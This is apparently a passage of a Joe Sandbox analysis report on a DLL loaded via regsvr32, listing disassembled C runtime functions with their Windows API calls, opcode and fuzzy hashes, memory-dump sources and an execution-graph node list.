                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1740715915-0
                                                                                                • Opcode ID: 8fd13cb57332c53c0b56804987c53cbba2a86d479b996acbaba7fe73ff76abaf
                                                                                                • Instruction ID: e94c86d600dc1b522e68b7f54a2c045815f7b12591a3e06eb6ac773d160087c9
                                                                                                • Opcode Fuzzy Hash: 8fd13cb57332c53c0b56804987c53cbba2a86d479b996acbaba7fe73ff76abaf
                                                                                                • Instruction Fuzzy Hash: 8B51CC72604606AFEB19CF36D852FAAB7BAEF64314F10412AED15472D1E731E874CB90
                                                                                                Function 6F95792D Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • GetLastError.KERNEL32 ref: 6F957991
                                                                                                • __dosmaperr.LIBCMT ref: 6F957998
                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6F9579D2
                                                                                                • __dosmaperr.LIBCMT ref: 6F9579D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1913693674-0
                                                                                                • Opcode ID: 106d213be465e8bbc35f12edc7bc4e2a72873f08a5b858c4c96e4d53c6193b83
                                                                                                • Instruction ID: 78a20d634b7c6c4bc48c33d63c8dfc9a800d1de47c4891f9f1ab74e1c0d8c718
                                                                                                • Opcode Fuzzy Hash: 106d213be465e8bbc35f12edc7bc4e2a72873f08a5b858c4c96e4d53c6193b83
                                                                                                • Instruction Fuzzy Hash: A621B07120471EAF9B50DFB5C99085AB7ADEF01368710C519EE18871D0D730EE31CBA2
                                                                                                Function 6F958C2E Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6F958C36
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C6E
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 158306478-0
                                                                                                • Opcode ID: d9790b809ee6d5fbb68c96597575fae9a4322b63d29cbfb3be0a61eba9aa171a
                                                                                                • Instruction ID: 9347431251b9575f5978865984a4f43ff6e5c38502980fab9cede6ebc57645cd
                                                                                                • Opcode Fuzzy Hash: d9790b809ee6d5fbb68c96597575fae9a4322b63d29cbfb3be0a61eba9aa171a
                                                                                                • Instruction Fuzzy Hash: 0D11A5F151A615BFB71597B58ECCCAF396CDF562A97000114F501952C5EB30ED21C7B1
                                                                                                Function 6F95D916 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000), ref: 6F95D92D
                                                                                                • GetLastError.KERNEL32(?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?,?,6F95C78B,00000000), ref: 6F95D939
                                                                                                  • Part of subcall function 6F95D8FF: CloseHandle.KERNEL32(FFFFFFFE,6F95D949,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?), ref: 6F95D90F
                                                                                                • ___initconout.LIBCMT ref: 6F95D949
                                                                                                  • Part of subcall function 6F95D8C1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F95D8F0,6F95D0C4,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D8D4
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D95E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                • Opcode ID: 86ea7d3a8b6db4968cf77ff69b9186062e16c007ab02fe31077746fe7a85e8a4
                                                                                                • Instruction ID: 8be10e3987927ed1fee0474222823d1413298eda69ff01bfbbaaef7112f550fb
                                                                                                • Opcode Fuzzy Hash: 86ea7d3a8b6db4968cf77ff69b9186062e16c007ab02fe31077746fe7a85e8a4
                                                                                                • Instruction Fuzzy Hash: 61F0303640A555BBEF165F91DC44A993F77FF093B0B044059FB189A260CB32E930DB91
                                                                                                Function 6F954483 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F9544A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2118026453-2084237596
                                                                                                • Opcode ID: f0777ed0d399748d5e30526737e154581491d4571748bf396a66f906d37686cd
                                                                                                • Instruction ID: b081194dbf2f0f46654faa82a9f911484b17bc410737f2bd3b4605dd9e6d1423
                                                                                                • Opcode Fuzzy Hash: f0777ed0d399748d5e30526737e154581491d4571748bf396a66f906d37686cd
                                                                                                • Instruction Fuzzy Hash: 8D4159B1900209AFDF05CFA8D891AEE7BB9BF48308F148199F91467291D336E971DF51

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.7%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:1316
                                                                                                Total number of Limit Nodes:19
                                                                                                execution_graph 8751 6f955391 8783 6f956c3d 8751->8783 8754 6f9553cc 8756 6f955404 8754->8756 8757 6f9553d0 8754->8757 8755 6f9554a1 8760 6f954f7d _Allocate 11 API calls 8755->8760 8761 6f95546d 8756->8761 8762 6f956a7b __dosmaperr 14 API calls 8756->8762 8758 6f9553d6 8757->8758 8759 6f9553e3 8757->8759 8763 6f956a8e __freea 14 API calls 8758->8763 8764 6f9577f8 44 API calls 8759->8764 8765 6f9554ab 8760->8765 8769 6f956a8e __freea 14 API calls 8761->8769 8766 6f955421 8762->8766 8772 6f9553db 8763->8772 8767 6f9553eb 8764->8767 8768 6f956a7b __dosmaperr 14 API calls 8766->8768 8770 6f956a8e __freea 14 API calls 8767->8770 8771 6f955428 8768->8771 8769->8772 8770->8772 8775 6f956a7b __dosmaperr 14 API calls 8771->8775 8773 6f951cf9 _ValidateLocalCookies 5 API calls 8772->8773 8774 6f95549f 8773->8774 8776 6f955442 8775->8776 8777 6f955447 8776->8777 8778 6f955468 8776->8778 8780 6f956a7b __dosmaperr 14 API calls 8776->8780 8781 6f956a8e __freea 14 API calls 8777->8781 8779 6f956a7b __dosmaperr 14 API calls 8778->8779 8779->8761 8782 6f955455 8780->8782 8781->8772 8782->8777 8782->8778 8786 6f956ac8 8783->8786 8787 6f956ad4 CallCatchBlock 8786->8787 8794 6f956933 EnterCriticalSection 8787->8794 8789 6f956adf 8795 6f956b2d 8789->8795 8794->8789 8796 6f956b3c 8795->8796 8797 6f956b4f 8795->8797 8798 6f956a7b __dosmaperr 14 API calls 8796->8798 8797->8796 8799 6f956b62 8797->8799 8800 6f956b41 8798->8800 8816 6f956bd0 8799->8816 8802 6f954f50 ___std_exception_copy 39 API calls 8800->8802 8808 6f956afb 8802->8808 8803 6f956b6b CallCatchBlock 8804 6f956ba7 8803->8804 8805 6f956b96 8803->8805 8803->8808 8807 6f956040 ___std_exception_copy 39 API calls 8804->8807 8806 6f956a7b __dosmaperr 14 API calls 8805->8806 8806->8808 8809 6f956bb2 8807->8809 8813 6f956b24 8808->8813 8809->8808 8810 6f956bc3 8809->8810 8811 6f954f7d _Allocate 11 API calls 8810->8811 8812 6f956bcf 8811->8812 8854 6f95697b LeaveCriticalSection 8813->8854 8815 6f9553bc 8815->8754 8815->8755 8818 6f956bdd 8816->8818 8817 6f956c30 8817->8803 8818->8817 8820 6f95a89b 8818->8820 8821 6f95a8af 8820->8821 8822 6f95a8a9 8820->8822 8821->8818 8823 6f95cc30 8822->8823 8824 6f95cbe8 8822->8824 8836 6f95cc46 8823->8836 8826 6f95cbee 8824->8826 8827 6f95cc0b 8824->8827 8829 6f956a7b __dosmaperr 14 API calls 8826->8829 8832 6f956a7b __dosmaperr 14 API calls 8827->8832 8835 6f95cc29 8827->8835 8828 6f95cbfe 8828->8818 8830 6f95cbf3 8829->8830 8831 6f954f50 ___std_exception_copy 39 API calls 8830->8831 8831->8828 8833 6f95cc1a 8832->8833 8834 6f954f50 ___std_exception_copy 39 API calls 8833->8834 8834->8828 8835->8818 8837 6f95cc56 8836->8837 8838 6f95cc70 8836->8838 8839 6f956a7b __dosmaperr 14 API calls 8837->8839 8840 6f95cc8f 8838->8840 8841 6f95cc78 8838->8841 8844 6f95cc5b 8839->8844 8842 6f95ccb2 8840->8842 8843 6f95cc9b 8840->8843 8845 6f956a7b __dosmaperr 14 API calls 8841->8845 8850 6f9576bf 39 API calls 8842->8850 8853 6f95cc66 8842->8853 8846 6f956a7b __dosmaperr 14 API calls 8843->8846 8847 6f954f50 ___std_exception_copy 39 API calls 8844->8847 8848 6f95cc7d 8845->8848 8849 6f95cca0 8846->8849 8847->8853 8851 6f954f50 ___std_exception_copy 39 API calls 8848->8851 8852 6f954f50 ___std_exception_copy 39 API calls 8849->8852 8850->8853 8851->8853 8852->8853 8853->8828 8854->8815 9539 6f955e81 9540 6f955e1f __EH_prolog3 9539->9540 9541 6f955e89 9539->9541 9544 6f955ce4 9540->9544 9543 6f955e4c __DllMainCRTStartup@12 9545 6f955cf0 CallCatchBlock 9544->9545 9552 6f956933 EnterCriticalSection 9545->9552 9547 6f955cfe 9553 6f955d3f 9547->9553 9552->9547 9554 6f955d5e 9553->9554 9555 6f955d0b 9553->9555 9554->9555 9556 6f956a8e __freea 14 API calls 9554->9556 9557 6f955d33 9555->9557 9556->9555 9560 6f95697b LeaveCriticalSection 9557->9560 9559 6f955d1c 9559->9543 9560->9559 8855 6f951000 8868 6f951360 8855->8868 8857 6f95101d 8858 6f951360 41 API calls 8857->8858 8859 6f95102a 8858->8859 8872 6f95537b 8859->8872 8863 6f95105b 8864 6f951560 task 39 API calls 8863->8864 8865 6f951063 8864->8865 8866 6f951cf9 _ValidateLocalCookies 5 API calls 8865->8866 8867 6f95106d 8866->8867 8869 6f951376 8868->8869 8878 6f9519e0 8869->8878 8871 6f9513a1 task 8871->8857 8873 6f95519b CallCatchBlock 21 API calls 8872->8873 8874 6f951053 8873->8874 8875 6f951560 8874->8875 8980 6f9518b0 8875->8980 8877 6f95156f task 8877->8863 8879 6f9519f0 8878->8879 8882 6f951a10 8879->8882 8881 6f951a09 8881->8871 8883 6f951a68 8882->8883 8885 6f951a24 task 8882->8885 8886 6f9511f0 8883->8886 8885->8881 8887 6f951201 8886->8887 8889 6f95120b task 8887->8889 8894 6f951990 8887->8894 8897 6f9519a0 8889->8897 8891 6f95123d task 8893 6f951292 8891->8893 8901 6f951ad0 8891->8901 8893->8885 8904 6f951c9b 8894->8904 8898 6f9519b0 allocator 8897->8898 8936 6f9510a0 8898->8936 8972 6f9511a0 8901->8972 8903 6f951ae4 8903->8893 8909 6f951c23 8904->8909 8908 6f951cba 8915 6f951bd3 8909->8915 8912 6f952f62 8913 6f952f7c 8912->8913 8914 6f952fa9 RaiseException 8912->8914 8913->8914 8914->8908 8918 6f952ee0 8915->8918 8919 6f952eed 8918->8919 8925 6f951bff 8918->8925 8919->8925 8926 6f955549 8919->8926 8922 6f952f1a 8933 6f9555ad 8922->8933 8923 6f956040 ___std_exception_copy 39 API calls 8923->8922 8925->8912 8931 6f95786a _unexpected 8926->8931 8927 6f9578a8 8929 6f956a7b __dosmaperr 14 API calls 8927->8929 8928 6f957893 HeapAlloc 8930 6f952f0a 8928->8930 8928->8931 8929->8930 8930->8922 8930->8923 8931->8927 8931->8928 8932 6f9554c6 _Allocate EnterCriticalSection LeaveCriticalSection 8931->8932 8932->8931 8934 6f956a8e __freea 14 API calls 8933->8934 8935 6f9555c5 8934->8935 8935->8925 8937 6f9510ac 8936->8937 8938 6f9510ba 8936->8938 8942 6f9510e0 8937->8942 8941 6f9510b5 8938->8941 8950 6f951750 8938->8950 8941->8891 8943 6f9510f7 8942->8943 8944 6f9510fc 8942->8944 8953 6f951890 8943->8953 8946 6f951750 _Allocate 16 API calls 8944->8946 8947 6f951105 8946->8947 8949 6f951120 8947->8949 8957 6f954f60 8947->8957 8949->8941 8962 6f951cbb 8950->8962 8954 6f95189e stdext::threads::lock_error::lock_error 8953->8954 8955 6f952f62 CallUnexpected RaiseException 8954->8955 8956 6f9518ac 8955->8956 8956->8944 8958 6f954e9c _Allocate 39 API calls 8957->8958 8959 6f954f6f 8958->8959 8960 6f954f7d _Allocate 11 API calls 8959->8960 8961 6f954f7c 8960->8961 8966 6f951cc0 8962->8966 8963 6f955549 ___std_exception_copy 15 API calls 8963->8966 8964 6f95175c 8964->8941 8965 6f9554c6 _Allocate 2 API calls 8965->8966 8966->8963 8966->8964 8966->8965 8968 6f951cdc _Allocate 8966->8968 8967 6f9520a9 stdext::threads::lock_error::lock_error 8969 6f952f62 CallUnexpected RaiseException 8967->8969 8968->8967 8971 6f952f62 CallUnexpected RaiseException 8968->8971 8970 6f9520c6 8969->8970 8971->8967 8973 6f9511b9 _Deallocate 8972->8973 8974 6f9511ac 8972->8974 8973->8903 8976 6f9516e0 8974->8976 8977 6f95171e 8976->8977 8978 6f954f60 _Allocate 39 API calls 8977->8978 8979 6f951739 8977->8979 8978->8977 8979->8973 8982 6f9518c1 task 8980->8982 8981 6f951905 task 8981->8877 8982->8981 8983 6f951ad0 allocator 39 API calls 8982->8983 8983->8981 7969 6f956cb6 7970 6f956cc5 7969->7970 7971 6f956cdd 7969->7971 8093 6f956a7b 7970->8093 7971->7970 7977 6f956cf4 _strrchr 7971->7977 7975 6f956cd5 7976 6f956d7f _strrchr 7978 6f956da2 7976->7978 7979 6f956dcd 7976->7979 7977->7976 8099 6f9578b8 7977->8099 8017 6f9577f8 7978->8017 7982 6f9578b8 _unexpected 14 API calls 7979->7982 7981 6f956daa 7984 6f956db4 7981->7984 7990 6f956d46 7981->7990 7985 6f956de9 7982->7985 8030 6f956eab 7984->8030 7988 6f956df1 7985->7988 7989 6f956e00 7985->7989 7993 6f956a8e __freea 14 API calls 7988->7993 7994 6f956040 ___std_exception_copy 39 API calls 7989->7994 7991 6f956a8e __freea 14 API calls 7990->7991 7991->7975 7992 6f956dc3 7996 6f956a8e __freea 14 API calls 7992->7996 7993->7992 7997 6f956e0b 7994->7997 7996->7975 7999 6f956e9c 7997->7999 8001 6f956a7b __dosmaperr 14 API calls 7997->8001 8130 6f954f7d IsProcessorFeaturePresent 7999->8130 8008 6f956e23 8001->8008 8003 6f956ea8 8006 6f956040 ___std_exception_copy 39 API calls 8006->8008 8007 6f9577f8 44 API calls 8007->8008 8008->7999 8008->8006 8008->8007 8009 6f956e6d 8008->8009 8010 6f956e57 8008->8010 8011 6f956a7b __dosmaperr 14 API calls 8009->8011 8012 6f956a8e __freea 14 API calls 8010->8012 8013 6f956e72 8011->8013 8012->7990 8014 6f956eab 53 API calls 8013->8014 8015 6f956e86 8014->8015 8016 6f956a8e __freea 14 API calls 8015->8016 8016->7992 8018 6f957814 8017->8018 8019 6f957806 8017->8019 8160 6f957741 8018->8160 8134 6f957532 8019->8134 8026 6f957842 8028 6f956a8e __freea 14 API calls 8026->8028 8029 6f957864 8026->8029 8027 6f957532 41 API calls 8027->8026 8028->8029 8029->7981 8031 6f956ece 8030->8031 8032 6f956eb9 8030->8032 8031->8032 8034 6f956ee4 8031->8034 8035 6f956eda 8031->8035 8033 6f956a7b __dosmaperr 14 API calls 8032->8033 8036 6f956ebe 8033->8036 8040 6f956f22 8034->8040 8041 6f956f0b 8034->8041 8037 6f956a68 __dosmaperr 14 API calls 8035->8037 8038 6f954f50 ___std_exception_copy 39 API calls 8036->8038 8037->8032 8039 6f956ec9 8038->8039 8039->7992 8646 6f9571ed 8040->8646 8042 6f956a8e __freea 14 API calls 8041->8042 8044 6f956f13 8042->8044 8046 6f956a8e __freea 14 API calls 8044->8046 8050 6f956f1e 8046->8050 8047 6f956f44 8049 6f956a8e __freea 14 API calls 8047->8049 8048 6f956f6c 8052 6f956a68 __dosmaperr 14 API calls 8048->8052 8051 6f956f4c 8049->8051 8050->7992 8053 6f956a8e __freea 14 API calls 8051->8053 8054 6f956f7d CallCatchBlock 8052->8054 8055 6f956f57 8053->8055 8649 6f95ae14 8054->8649 8056 6f956a8e __freea 14 API calls 8055->8056 8056->8050 8059 6f957014 GetLastError 8062 6f956a21 __dosmaperr 14 API calls 8059->8062 8060 6f956fd6 8063 6f957039 8060->8063 8064 6f956fda WaitForSingleObject GetExitCodeProcess 8060->8064 8061 6f9570af 8065 6f95535e CallCatchBlock 21 API calls 8061->8065 8066 6f957020 8062->8066 8071 6f95703e 8063->8071 8072 6f95707a 8063->8072 8064->8059 8067 6f956ff3 8064->8067 8068 6f9570b6 8065->8068 8069 6f957025 CloseHandle 8066->8069 8070 6f95702c 8066->8070 8075 6f957004 8067->8075 8076 6f956ffd CloseHandle 8067->8076 8069->8070 8079 6f95700f 8070->8079 8080 6f957030 CloseHandle 8070->8080 8073 6f957042 CloseHandle 8071->8073 8074 6f957049 8071->8074 8077 6f957085 8072->8077 8078 6f95707e CloseHandle 8072->8078 8073->8074 8074->8079 8081 6f95704d CloseHandle 8074->8081 8075->8079 8083 6f957008 CloseHandle 8075->8083 8076->8075 8084 6f956a8e __freea 14 API calls 8077->8084 8078->8077 8082 6f956a8e __freea 14 API calls 8079->8082 8080->8079 8081->8079 8085 6f95705e 8082->8085 8083->8079 8086 6f95708d 8084->8086 8088 6f956a8e __freea 14 API calls 8085->8088 8087 6f956a8e __freea 14 API calls 8086->8087 8089 6f957099 8087->8089 8090 6f95706a 8088->8090 8091 6f956a8e __freea 14 API calls 8089->8091 8092 6f956a8e __freea 14 API calls 8090->8092 8091->8050 8092->8050 8094 6f9566b8 __dosmaperr 14 API calls 8093->8094 8095 6f956a80 8094->8095 8096 6f954f50 8095->8096 8694 6f954e9c 8096->8694 8104 6f9578c5 _unexpected 8099->8104 8100 6f957905 8103 6f956a7b __dosmaperr 13 API calls 8100->8103 8101 6f9578f0 RtlAllocateHeap 8102 6f956d3e 8101->8102 8101->8104 8102->7990 8106 6f956040 8102->8106 8103->8102 8104->8100 8104->8101 8105 6f9554c6 _Allocate 2 API calls 8104->8105 8105->8104 8107 6f95605c 8106->8107 8108 6f95604e 8106->8108 8109 6f956a7b __dosmaperr 14 API calls 8107->8109 8108->8107 8113 6f956074 8108->8113 8110 6f956064 8109->8110 8112 6f954f50 ___std_exception_copy 39 API calls 8110->8112 8111 6f95606e 8111->7999 8115 6f95a98c 8111->8115 8112->8111 8113->8111 8114 6f956a7b __dosmaperr 14 API calls 8113->8114 8114->8110 8116 6f95a9a8 8115->8116 8119 6f95a99a 8115->8119 8117 6f956a7b __dosmaperr 14 API calls 8116->8117 8118 6f95a9b0 8117->8118 8120 6f954f50 ___std_exception_copy 39 API calls 8118->8120 8119->8116 8122 6f95a9cf 8119->8122 8121 6f956d6b 8120->8121 8121->7999 8124 6f956a8e 8121->8124 8122->8121 8123 6f956a7b __dosmaperr 14 API calls 8122->8123 8123->8118 8125 6f956ac3 8124->8125 8126 6f956a99 HeapFree 8124->8126 8125->7976 8126->8125 8127 6f956aae GetLastError 8126->8127 8128 6f956abb __dosmaperr 8127->8128 8129 6f956a7b __dosmaperr 12 API calls 8128->8129 8129->8125 8131 6f954f89 8130->8131 8132 6f954d54 CallCatchBlock 8 API calls 8131->8132 8133 6f954f9e GetCurrentProcess TerminateProcess 8132->8133 8133->8003 8135 6f957567 8134->8135 8136 6f95754c 8134->8136 8138 6f957573 8135->8138 8139 6f95758e GetFileAttributesExW 8135->8139 8168 6f956a68 8136->8168 8141 6f956a68 __dosmaperr 14 API calls 8138->8141 8142 6f95759f GetLastError 8139->8142 8149 6f9575ae 8139->8149 8145 6f957578 8141->8145 8171 6f956a21 8142->8171 8144 6f956a7b __dosmaperr 14 API calls 8146 6f957559 8144->8146 8147 6f956a7b __dosmaperr 14 API calls 8145->8147 8148 6f954f50 ___std_exception_copy 39 API calls 8146->8148 8150 6f957580 8147->8150 8151 6f957563 8148->8151 8149->8151 8153 6f956a68 __dosmaperr 14 API calls 8149->8153 8155 6f954f50 ___std_exception_copy 39 API calls 8150->8155 8176 6f951cf9 8151->8176 8157 6f9575c6 8153->8157 8154 6f956a7b __dosmaperr 14 API calls 8154->8151 8155->8151 8156 6f9575ee 8156->7981 8158 6f956a7b __dosmaperr 14 API calls 8157->8158 8159 6f9575ab 8158->8159 8159->8154 8375 6f9576bf 8160->8375 8164 6f957765 8165 6f9576a2 8164->8165 8590 6f9575f0 8165->8590 8183 6f9566b8 GetLastError 8168->8183 8170 6f956a6d 8170->8144 8172 6f956a68 __dosmaperr 14 API calls 8171->8172 8173 6f956a2c __dosmaperr 8172->8173 8174 6f956a7b __dosmaperr 14 API calls 8173->8174 8175 6f956a3f 8174->8175 8175->8159 8177 6f951d01 8176->8177 8178 6f951d02 IsProcessorFeaturePresent 8176->8178 8177->8156 8180 6f952109 8178->8180 8374 6f9520cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8180->8374 8182 6f9521ec 8182->8156 8184 6f9566ce 8183->8184 8187 6f9566d4 8183->8187 8206 6f9593b7 8184->8206 8204 6f9566d8 SetLastError 8187->8204 8211 6f9593f6 8187->8211 8189 6f9578b8 _unexpected 12 API calls 8191 6f956705 8189->8191 8192 6f95670d 8191->8192 8193 6f95671e 8191->8193 8194 6f9593f6 _unexpected 6 API calls 8192->8194 8195 6f9593f6 _unexpected 6 API calls 8193->8195 8196 6f95671b 8194->8196 8197 6f95672a 8195->8197 8201 6f956a8e __freea 12 API calls 8196->8201 8198 6f956745 8197->8198 8199 6f95672e 8197->8199 8216 6f956369 8198->8216 8200 6f9593f6 _unexpected 6 API calls 8199->8200 8200->8196 8201->8204 8204->8170 8205 6f956a8e __freea 12 API calls 8205->8204 8221 6f9591f8 8206->8221 8209 6f9593dc 8209->8187 8210 6f9593ee TlsGetValue 8212 6f9591f8 _unexpected 5 API calls 8211->8212 8213 6f959412 8212->8213 8214 6f959430 TlsSetValue 8213->8214 8215 6f9566f0 8213->8215 8215->8189 8215->8204 8236 6f9561fd 8216->8236 8222 6f959224 8221->8222 8223 6f959228 8221->8223 8222->8209 8222->8210 8223->8222 8228 6f95912d 8223->8228 8226 6f959242 GetProcAddress 8226->8222 8227 6f959252 _unexpected 8226->8227 8227->8222 8234 6f95913e ___vcrt_InitializeCriticalSectionEx 8228->8234 8229 6f9591d4 8229->8222 8229->8226 8230 6f95915c LoadLibraryExW 8231 6f959177 GetLastError 8230->8231 8232 6f9591db 8230->8232 8231->8234 8232->8229 8233 6f9591ed FreeLibrary 8232->8233 8233->8229 8234->8229 8234->8230 8235 6f9591aa LoadLibraryExW 8234->8235 8235->8232 8235->8234 8237 6f956209 CallCatchBlock 8236->8237 8250 6f956933 EnterCriticalSection 8237->8250 8239 6f956213 8251 6f956243 8239->8251 8242 6f95630f 8243 6f95631b CallCatchBlock 8242->8243 8255 6f956933 EnterCriticalSection 8243->8255 8245 6f956325 8256 6f9564f0 8245->8256 8247 6f95633d 8260 6f95635d 8247->8260 8250->8239 8254 6f95697b LeaveCriticalSection 8251->8254 8253 6f956231 8253->8242 8254->8253 8255->8245 8257 6f956526 _unexpected 8256->8257 8258 6f9564ff _unexpected 8256->8258 8257->8247 8258->8257 8263 6f95a1ed 8258->8263 8373 6f95697b LeaveCriticalSection 8260->8373 8262 6f95634b 8262->8205 8264 6f95a26d 8263->8264 8267 6f95a203 8263->8267 8266 6f956a8e __freea 14 API calls 8264->8266 8289 6f95a2bb 8264->8289 8268 6f95a28f 8266->8268 8267->8264 8271 6f95a236 8267->8271 8274 6f956a8e __freea 14 API calls 8267->8274 8269 6f956a8e __freea 14 API calls 8268->8269 8270 6f95a2a2 8269->8270 8276 6f956a8e __freea 14 API calls 8270->8276 8277 6f956a8e __freea 14 API calls 8271->8277 8290 6f95a258 8271->8290 8272 6f956a8e __freea 14 API calls 8278 6f95a262 8272->8278 8273 6f95a2c9 8279 6f95a329 8273->8279 8288 6f956a8e 14 API calls __freea 8273->8288 8275 6f95a22b 8274->8275 8291 6f95a50a 8275->8291 8281 6f95a2b0 8276->8281 8282 6f95a24d 8277->8282 8283 6f956a8e __freea 14 API calls 8278->8283 8284 6f956a8e __freea 14 API calls 8279->8284 8286 6f956a8e __freea 14 API calls 8281->8286 8319 6f95a608 8282->8319 8283->8264 8285 6f95a32f 8284->8285 8285->8257 8286->8289 8288->8273 8331 6f95a35e 8289->8331 8290->8272 8292 6f95a51b 8291->8292 8318 6f95a604 8291->8318 8293 6f95a52c 8292->8293 8295 6f956a8e __freea 14 API calls 8292->8295 8294 6f95a53e 8293->8294 8296 6f956a8e __freea 14 API calls 8293->8296 8297 6f95a550 8294->8297 8298 6f956a8e __freea 14 API calls 8294->8298 8295->8293 8296->8294 8299 6f95a562 8297->8299 8300 6f956a8e __freea 14 API calls 8297->8300 8298->8297 8301 6f95a574 8299->8301 8303 6f956a8e __freea 14 API calls 8299->8303 8300->8299 8302 6f95a586 8301->8302 8304 6f956a8e __freea 14 API calls 8301->8304 8305 6f95a598 8302->8305 8306 6f956a8e __freea 14 API calls 8302->8306 8303->8301 8304->8302 8307 6f95a5aa 8305->8307 8308 6f956a8e __freea 14 API calls 8305->8308 8306->8305 8309 6f956a8e __freea 14 API calls 8307->8309 8311 6f95a5bc 8307->8311 8308->8307 8309->8311 8310 6f956a8e __freea 14 API calls 8312 6f95a5ce 